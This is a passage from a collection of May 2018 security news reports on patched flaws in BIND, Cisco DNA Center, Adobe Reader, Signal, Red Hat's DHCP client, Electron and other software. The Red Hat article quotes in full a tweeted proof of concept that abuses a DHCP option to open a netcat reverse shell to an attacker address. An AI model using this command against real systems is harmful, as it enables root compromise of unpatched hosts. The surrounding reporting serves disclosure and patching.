“This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

The CVE-2018-5736 flaw affects BIND 9.12.0 and 9.12.1, the ISC addressed it with the release of the version 9.12.1-P1. Experts noticed that admins need to update to version 9.12.1-P2 because version 9.12.1-P1 was affected by a problem.

This is the third time that the ISC provides security updates for BIND software this year. The first updates were released in January to address a high severity vulnerability that could cause DNS servers crash,

The second updates were released in February to address remotely exploitable vulnerabilities in DHCP.


Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine
21.5.2018 securityaffairs  
Vulnerebility

Google awarded the 18-year-old student Ezequiel Pereira a total of $36,337 for the discovery of a critical remote code execution vulnerability that affected the Google App Engine.
The Google App Engine is a framework that allows Google users to develop and host web applications on a fully managed serverless platform.

In February, Pereira gained access to a non-production Google App Engine development environment, then he discovered that it was possible to use some of Google’s internal APIs.

Pereira ethically reported the issue through the Google’s Vulnerability Reward Program (VRP). The experts at Google ranked the flaw as a P1 priority, a level that is assigned to vulnerabilities that could have a significant impact on a large number of users and that for this reason must be addressed as soon as possible.

Meantime Pereira continued his test and submitted a second report to Google after discovering further issues, then Google invited Pereira to stop his activities due to the risk to “easily break something using these internal APIs.”

Google security team discovered that the flaw reported by the youngster could led to remote code execution.

Google App Engine

Pereira published a detailed analysis of its finding after Google has fixed them and awarded him.

“In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program.” reads the blog post published by the researcher.

“Some time ago, I noticed every Google App Engine (GAE) application replied to every HTTP request with a “X-Cloud-Trace-Context” header, so I assumed any website returning that header is probably running on GAE.
Thanks to that, I learned “appengine.google.com” itself runs on GAE, but it can perform some actions that cannot be done anywhere else and common user applications cannot perform, so I tried to discover how was it able to do those actions.
Obviously, it has to make use of some API, interface or something only available to applications ran by Google itself, but maybe there was a way to access them, and I looked for that.”

Below the timeline for the flaw:

February 2018: Issue found
February 25th, 2018: Initial report (Only the “
stubby
” API)
March 4th and 5th, 2018: The “
app_config_service
” API discovered and reported
March between 6th and 13th, 2018: The access to non-prod GAE environments was blocked with a 429 error page
March 13th, 2018: Reward of $36,337 issued
May 16th, 2018: Issue confirmed as fixed


Two Vulnerabilities Patched in BIND DNS Software
20.5.2018 securityweek 
Vulnerebility

Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.

While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.

One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off,” ISC explained in an advisory. “Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.”

The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.

The second flaw, CVE-2018-5736, is also remotely exploitable, but only if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” ISC wrote. “This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

This vulnerability impacts BIND 9.12.0 and 9.12.1, and it has been patched in version 9.12.1-P1. However, users need to update to version 9.12.1-P2 as version 9.12.1-P1 was recalled before the public announcement due to a defect.

ISC support customers, including OEMs that re-package the organization’s open source code into commercial products, were notified about these vulnerabilities on May 9.

The latest version of BIND also includes a security improvement related to update-policy rules. ISC also noted that “named will now log a warning if the old root DNSSEC key is explicitly configured and has not been updated.”

This is the third round of security updates released for BIND this year. The first was released in mid-January and the second in late February. The February update impacted BIND Supported Preview Edition, but not any publicly released versions.


Critical Flaws in Cisco DNA Center Allow Unauthorized Access
18.5.2018 securityweek 
Vulnerebility

Cisco has found and patched three critical unauthorized access vulnerabilities in its Digital Network Architecture (DNA) platform.

Cisco DNA is a solution that helps enterprises automate network operations, making it easy to design, provision and apply policies across their environments.

Cisco discovered that the DNA Center is impacted by three serious flaws. One of them, CVE-2018-0222, is related to the existence of undocumented static credentials for the default admin account.

A remote attacker could leverage these credentials to gain access to the affected system and execute commands with root privileges. The issue has been addressed with the release of Cisco DNA Center software version 1.1.3.

The second vulnerability, CVE-2018-0271, allows a remote attacker to bypass authentication and obtain privileged access to critical services in the DNA Center. This flaw has been patched with the release of Cisco DNA Center software version 1.1.2.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,” Cisco explained in an advisory.

The third critical security hole in DNA Center, CVE-2018-0268, also allows a remote attacker to bypass authentication and obtain elevated privileges. A patch is included in version 1.1.3.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” Cisco said. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

All the vulnerabilities were discovered by Cisco itself and there is no evidence of malicious exploitation.

Cisco published more than a dozen security advisories on Wednesday, including four that describe high severity vulnerabilities.

The list includes a cross-site request forgery (CSRF) flaw in IoT Field Network Director (IoT-FND), a denial-of-service (DoS) bug in the Identity Services Engine (ISE), a shell access vulnerability in Enterprise NFV Infrastructure Software (NFVIS), and a DoS problem in Meeting Server.


CISCO issued security updates to address three critical flaws in Cisco DNA Center
18.5.2018 securityaffairs
Vulnerebility

Cisco has issued security updates to address three critical vulnerabilities in its DNA Center appliance, admins need to update their installs as soon as possible.
Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance.

The DNA Center is a network management and administration tool, experts discovered three vulnerabilities that could be exploited by remote unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting the DNA Center, the attacker can use them to completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote unauthenticated attacker to bypass authentication and gain a privileged access to critical services in the DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,”

The third critical flaw in DNA Center fixed by Cisco tracked as CVE-2018-0268 could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out a security update to DNA Center via its System Updates tool, admins need to install the version 1.1.3 as soon as possible.


Critical Code Execution Flaws Patched in Advantech WebAccess

16.5.2018 securityweek  Vulnerebility

Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.

The list of security holes rated critical includes unrestricted file upload, path traversal, stack-based buffer overflow, and untrusted pointer dereference issues, all of which can be exploited for arbitrary code execution.

Advantech has also fixed high severity vulnerabilities that can be exploited to obtain sensitive information, modify files, and delete files. There are also a couple of medium severity issues that can be leveraged to steal session cookies and obtain potentially sensitive data through SQL injection.

According to ICS-CERT, the flaws affect WebAccess versions V8.2_20170817 and prior, WebAccess V8.3.0 and prior, WebAccess Dashboard V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior. The vendor patched them with the release of version 8.3.1 last week.

ICS-CERT has credited researchers Mat Powell, Andrea Micalizzi (rgod), Steven Seeley, Donato Onofri and Simone Onofri for discovering the security bugs. Many of the weaknesses were reported through Trend Micro’s Zero Day Initiative (ZDI), which will publish advisories in the coming weeks.

Seeley has identified tens of vulnerabilities in WebAccess this year, and some of them, affecting WebAccess HMI Designer, were disclosed in April before Advantech released patches.

ICS-CERT has published a total of four advisories for Advantech WebAccess vulnerabilities this year, including two in January.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better compared to many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, which was roughly half the number published in the previous year.


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
16.5.2018 securityweek 
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including a remote code execution flaw that has been exploited in the wild.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

The most serious of the flaws is CVE-2018-4990, which has been exploited in the wild in combination with CVE-2018-8120, a zero-day vulnerability affecting Windows. CVE-2018-8120 was fixed by Microsoft with the May 2018 Patch Tuesday updates.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.

*Updated with information on CVE-2018-4990


Signal Flaw Allowed Code Execution With No User Interaction
16.5.2018 securityweek 
Vulnerebility

An update released over the weekend for the desktop version of the privacy-focused communications app Signal patches a critical vulnerability that could have been exploited for remote code execution with no user interaction required.

Several researchers were looking at an unrelated cross-site scripting (XSS) vulnerability when they noticed that the XSS payload was triggered in the Signal desktop application.

The white hat hackers discovered that they could execute arbitrary code in the app simply by sending a specially crafted message containing specific HTML elements to the targeted user.

“The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources,” the researchers explained in an advisory.

They created proof-of-concept (PoC) payloads that could be used to crash Signal, obtain data from the targeted device’s /etc/passwd file, execute a remote JavaScript file, display a message in an iframe, play audio and video files, display a phishing page, and exfiltrate conversations.

Signal code execution vulnerability

“The critical thing here was that it didn’t required any interaction form the victim, other than simply being in the conversation. Anyone can initiate a conversation in Signal, so the attacker just needs to send a specially crafted URL to pwn the victim without further action,” Iván Ariel Barrera Oro, one of the researchers involved in finding the vulnerability, wrote in a blog post.

The vulnerability affects versions 1.7.1, 1.8.0, 1.9.0 and 1.10.0 on Windows, Linux and likely macOS. Signal developers patched the issue within a couple of hours with the release of version 1.10.1 on Saturday.

Based on an analysis of the source code, researchers determined that the flaw had been previously patched but the fix was removed – likely by accident – with a change made on April 10.


Hackers shared technical details of a Code Injection flaw in Signal App
16.5.2018 securityaffairs
Vulnerebility

Researchers shared details of a code injection vulnerability they found in the in the Signal app for both Windows and Linux systems. The flaw was promptly fixed by Signal.
Signal has fixed a code injection vulnerability in the app for both Windows and Linux systems that was reported by a team of Argentinian experts.

A remote attacker could have exploited the flaw to inject a malicious code inside the Signal desktop app running on the recipients’ system without requiring any user interaction, just by sending the victims a specially crafted link.

The discovery of the flaw was casual, the white-hat hackers Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo were chatting on Signal messenger when one of them shared a link of an XSS vulnerable Argentinian government website.

The experts noticed that the XSS payload was executed on the recipients’ Signal desktop app.

“we were chatting as usual and suddenly Alfredo shows us an XSS in an Argentinian government site (don’t worry, it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecure electron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.” reads a blog post published by the experts.

Signal XSS flaw

“I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”.”

Signal xss flaw 2
The researchers focused their attention on XSS flaws in the Signal Messaging App and conducted other tests discovering that the vulnerabilities was affecting the function responsible for handling shared links.

The experts discovered that it is possible to exploit the flaw to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.

“We tried different kinds of HTML elements: img, form, script, object, frame, framset, iframe, sound, video (this last two where funny).” continues the experts. “They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
send a crafted image in base64 format (we didn’t carry on with this)
send a file/phish and execute it with <iframe src=”…”></iframe>
have fun with <img>, <audio> and <video> 🙂”
The attackers can also exploit the vulnerability to inject a form on the recipient’s chat window, tricking them to provide sensitive information via social engineering attacks.
The experts applauded the Signal security team that on Friday in under 2 hours from the report has fixed the issue.

Experts explained that the flaw did not allow attackers to execute system commands or gain sensitive information like decryption keys on the recipients’ system.

After Signal fixed the issue, the researcher analyzed the file’s history and discovered the patch leverages a regex function to validate URLs.
The applied “patch” already existed in the application, but was probably accidentally removed in a commit on April 10th to fix an issue with linking.
The experts are concerned about that regex and they are afraid someone might exploit it.
The Signal app continues to be the most secure choice for encrypted communication.


Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
16.5.2018 securityaffairs
Vulnerebility

Red Hat has announced a critical vulnerability in its DHCP client tracked as CVE-2018-1111 that could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.
Felix Wilhelm from the Google security team discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux, the issue also affects other distros based on it like Fedora.

The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

Felix Wilhelm
@_fel1x
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.

3:54 PM - May 15, 2018
450
474 people are talking about this
Twitter Ads info and privacy
“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.

“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”

The DHCP client application receives network configuration parameters, including IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.

The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.

The researcher Barkın Kılıç published a PoC for the CVE-2018-1111, in the last screenshot the attacker accesses the shell as root.

Red Hat DHCP client flaw

Barkın Kılıç
@Barknkilic
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat

9:21 PM - May 15, 2018
824
661 people are talking about this
Twitter Ads info and privacy
Wilhelm did not release a PoC exploit code, but he explained that is so short in length that it even can fit in a tweet.

According to Wilhelm, an attacker using a malicious DHCP server, or connected to the same network as the victim, can exploit this vulnerability by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim’s system running vulnerable DHCP client.

The vulnerability affects Red Hat Enterprise Linux 6 and 7, admins should update their packages to the newer versions as soon as they are available.

“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.

Below the full list of affected RHEL versions:

Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).

Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.

Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.

Other Linux distros like OpenSUSE and Ubuntu are not affected by the vulnerability because their DHCP client implementation doesn’t include NetworkManager integration script by default.


Mysterious hackers ingenuously reveal two Zero-Days to security community
16.5.2018 securityaffairs
Vulnerebility

Mysterious hackers ingenuously reveal two zero-days to the security community, experts collaborated to promptly fix them.
Anton Cherepanov, security expert form ESET researcher, discovered two zero-days while analyzing a malicious PDF, according to the researcher the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (Two suspicious PDF samples zero-day 1, zero-day 2), the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote-code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape the Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below the steps composing the attack chain:

The victim receives and opens a weaponized PDF file
Once the user opened the PDF, a malicious JavaScript code will execute.
JavaScript code manipulates a button object
The Button object contains a specially-crafted JPEG2000 image, triggers a double-free vulnerability in Adobe Acrobat/Reader.
JavaScript code uses heap-spray techniques to obtain read and write memory access
JavaScript code then interacts with Adobe Reader’s JavaScript engine
The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute its own native shellcode.
Shellcode initializes a PE file embedded in the PDF
Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.
Even if the chain of the zero-days could be very dangerous, the developers allowed the security community to detect them by uploading it to a known virus scanning engine aiming to test its evasion capability.

zero-days exploits

The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
14.5.2018 securityweek
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including critical flaws that allow arbitrary code execution.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.


Code Execution Flaw in Electron Framework Could Affect Many Apps
14.5.2018 securityweek
Vulnerebility

GitHub’s open source development framework Electron is affected by a vulnerability that can allow remote code execution. Technical details and proof-of-concept (PoC) code were made public last week by the researcher who discovered the issue.

Electron allows developers to create cross-platform desktop applications using HTML, CSS and JavaScript. The framework has been used in the development of hundreds of applications, including Skype, GitHub Desktop, Slack, WhatsApp, Signal, Discord and WordPress.com.

Trustwave researcher Brendan Scarvell discovered earlier this year that certain applications created with Electron may allow remote code execution if they are affected by cross-site scripting (XSS) vulnerabilities and configured in a specific way.

“Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side,” the researcher explained in a blog post. “You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.”

Scarvell found that if an application is affected by an XSS flaw and certain options have not been manually set in the app’s webPreferences, an attacker can re-enable nodeIntegration during runtime and execute system commands.

The vulnerability, tracked as CVE-2018-1000136, was patched by Electron developers in March with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4. The security hole can also be mitigated by adding a piece of code provided by Electron.

The Signal messaging app and the Brave web browser are reportedly not impacted by this flaw.


UK mobile operator EE left a critical code system exposed with a default password
13.5.2018 securityaffairs
Vulnerebility

The EE operator, the British largest cell network in the UK with some 30 million customers, has left a critical code system exposed online with a default password.
EE, a British mobile network giant owned by BT Group has been accused of leaving a critical code repository on an open-source tool protected by a default username and password.

The British mobile network giant EE has reportedly left a critical code repository on an open-source tool protected by default credentials.

The disconcerting discovery was made by a security researcher that uses the Twitter handle of “six,” he found two million lines of code including access to the company’s private employee and developer APIs and Amazon Web Services secret keys.

“One of the largest mobile networks in Britain, EE, which is also owned by BT Group, was accused of risking the safety of a critical code repository due to bad security. Apparently, the company left the repository protected only by a default login info, according to one researcher.” reported the koddos.net website.

six
@lol_its_six
After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1

6:02 PM - May 10, 2018
29
18 people are talking about this
Twitter Ads info and privacy

six
@lol_its_six
10 May
After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over 2 million lines of private source code to their systems and employee systems, due to using an admin:admin user/pass combination - 1

six
@lol_its_six
Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w

6:03 PM - May 10, 2018

13
See six's other Tweets
Twitter Ads info and privacy
The availability of the keys could be exploited by attackers to analyze the code of the employee’s payment systems and discover vulnerabilities to exploit for malicious purposes.

According to the researcher, payment information, including credit card data, is at risk.

six
@lol_its_six
10 May
Replying to @lol_its_six
Access to this allows malicious hackers to analyze source code and identify vulnerabilities within. Actually; there's no need, since you can just view the code and take AWS keys, API keys, and more. Also; pushing to prod with 167 vulnerabilities???? (MyEE-Web master) - 2 pic.twitter.com/jyLEBt2f0w

six
@lol_its_six
You trust these guys with your credit card details, while they do not care about security, or customer privacy. Picture below shows access keys to authorize to their employee tool, for customer lookups. pic.twitter.com/clG4wsFcAM

6:05 PM - May 10, 2018

5
See six's other Tweets
Twitter Ads info and privacy
The code was exposed on the SonarQube open source platform hosted on an EE subdomain that was used by the mobile network company to analyze code with the intent to bugs and security vulnerabilities on their website.

According to the researchers, he notified the data leak EE several times for weeks, but the company did not reply.

“After waiting many many weeks for no reply, I have decided to let the public know, since @EE clearly do not care about security. EE has exposed over two million lines of private source code to their systems and employee systems, due to using an ‘admin:admin’ user/pass combination,” six tweeted.

uk EE operator

A spokesman for the company contacted ZDNet criticized the research and his claims and tried to downplay the incident sustaining that none of the customer or payment data at risk.

According to the spokesperson later it is a development code that does not contain any information related to the production infrastructure

Anyway, the company had changed the password and that the service was taken offline.

“Our final code then goes through further checks, processes, and review from our security team before being published,” the spokesperson said. “This development code does not contain any information pertaining to our production infrastructure or production API credentials as these are maintained in separate secure systems and details are changed by a separate team.”

“We take the security of our customer data extremely seriously and would like to thank the researcher for bringing this issue to our attention. We’re conducting a thorough investigation to make sure this does not happen again,” the spokesperson told ZDNet.


A new flaw in Electron poses a risk to apps based on the framework
13.5.2018 securityaffairs
Vulnerebility

Security experts have discovered a vulnerability in the Electron software framework that has been used for building a large number of popular desktop applications.
Popular desktop applications, including Skype, Slack, GitHub Desktop, Twitch, WordPress.com, and others, are potentially affected.

Electron is a node.js, V8, and Chromium open-source framework that allows developers to use web technologies such as JavaScript, HTML, and CSS to build desktop apps.

When building apps based on the Electron framework, developers can choose Electron API or the Node.js APIs and its modules.

Node.js APIs and built-in modules provide developers a wider integration with the OS and allow to access to more OS features.

In order to prevent the abuse of OS features, Electron team created a mechanism that prevents attacks on apps based on their framework.

“Electron applications are essentially web apps, which means they’re susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js’ built in modules.” reads the analysis published by Trustwave. “This makes XSS particularly dangerous, as an attacker’s payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side.”

Apps that run HTML and JS code on the desktop have the “nodeIntegration: false” option enabled by default, this implies that the access to the Node.js APIs and modules is disabled by default.

The WebView tag feature allows developers to embed content, such as web pages, into an Electron application and run it as a separate process.

“When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default.” continues the analysis.

When webviewTag is set to false in a webPreferences config file the nodeIngration is also set to false, however, if developers don’t declare webviewTag, then the Electron app considers nodeIntegration set to false.

Trustwave researcher Brendan Scarvell discovered that is possible to turn the nodeIntegration option to “true” and allows a malicious application to access Node.js APIs and modules and abuse more OS features.

Scarvell explained that if the developers of an Electron-based app have not specifically set the “webviewTag: false” option inside webPreferences config file, an attacker can exploit a cross-site scripting (XSS) vulnerability inside an app to create a new WebView component window to change the settings and to set the nodeIngrationflag to “true.”

electron

The expert published proof-of-concept code that could be used by an attacker to exploit any XSS flaw and gain access to the underlying OS.

“If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3), and hasn’t manually opted into one of the following:

Declared
webviewTag: false
in its webPreferences.
Enabled the nativeWindowOption option in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.” continues the analysis.
Scarvell reported the vulnerability to Electron team that addressed it in March.


Chrome 66 Update Patches Critical Security Flaw
11.5.2018 securityweek
Vulnerebility

An updated version of Chrome 66 is now available, which addresses a Critical security vulnerability that could allow an attacker to take over a system.

A total of 4 security vulnerabilities were addressed in the latest browser release, three of which were reported by external researchers.

The most important of the vulnerabilities are two High severity flaws that chain together to result in a sandbox escape. The issues include CVE-2018-6121, a privilege escalation in extensions, and CVE-2018-6122, a type confusion in V8.

The vulnerability chain was reported by an anonymous researcher on April 23. Google hasn’t published information on the flaw, but it appears that a remote attacker could exploit it to take control of vulnerable systems.

